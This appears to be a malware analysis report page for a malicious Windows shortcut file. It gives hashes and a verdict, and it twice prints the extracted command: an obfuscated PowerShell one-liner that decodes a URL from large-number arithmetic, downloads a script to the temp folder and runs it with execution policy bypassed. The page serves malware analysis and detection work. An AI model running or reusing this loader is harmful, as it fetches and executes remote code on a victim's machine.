General
Structural Analysis
Config.0
Yara Rules13
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 22083435c8b11e5c35845dcd4e88e744
|
| Sha1 | 81c9b94b772e98d03862b077209f0fa3a4f30559
|
| Sha256 | 911d74d73741f55d8b7fadc1b429d3e02625217931b428cebb6516acd9f4787c
|
| Sha384 | 6df07b6b3ed4719351037ba2365ad0cbc1fc98c51f07e926c2a277b4e13520c4a2d36cd6de916d027686fb7d577d9937
|
| Sha512 | d864426956a23fd66fdd6866aca1839f9af1ffc0cf028a3c811f80006eaf5582ba836c6476abb4dba87ae2326b31ec40caa3c582d901df37d4bd2b35c4928488
|
| SSDeep | 24:8/9SdmGjMDvSwjKUaWU3AcPWkp+/CWyp0zkwDPWXfITGC4wZVr4I0WK6c/6Cab7k:8lomeKpUQKKznP7t4wbUIA6q6Cax
|
| TLSH | 274100100BA20239DAF78B35ECFA6213B5217906EA215F4F12D5435848B4111E966F3F
|
File Structure
22083435c8b11e5c35845dcd4e88e744
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -ep bypass -c "$q=[bigint]\"826562940700966331525735653278350667138702576593\";$y=[bigint]\"190580670986420006407958954826012329000314514014\";$m=$q - $y;while($m -ne 0){$l+=[char]([int]($m -band 255));$m=$m -shr 8};iwr $l -OutFile $env:TEMP\xHlKd.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\xHlKd.ps1" |
22083435c8b11e5c35845dcd4e88e744 (1.89 KB)
File Structure
22083435c8b11e5c35845dcd4e88e744
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -ep bypass -c "$q=[bigint]\"826562940700966331525735653278350667138702576593\";$y=[bigint]\"190580670986420006407958954826012329000314514014\";$m=$q - $y;while($m -ne 0){$l+=[char]([int]($m -band 255));$m=$m -shr 8};iwr $l -OutFile $env:TEMP\xHlKd.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\xHlKd.ps1" Malicious |
22083435c8b11e5c35845dcd4e88e744 |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.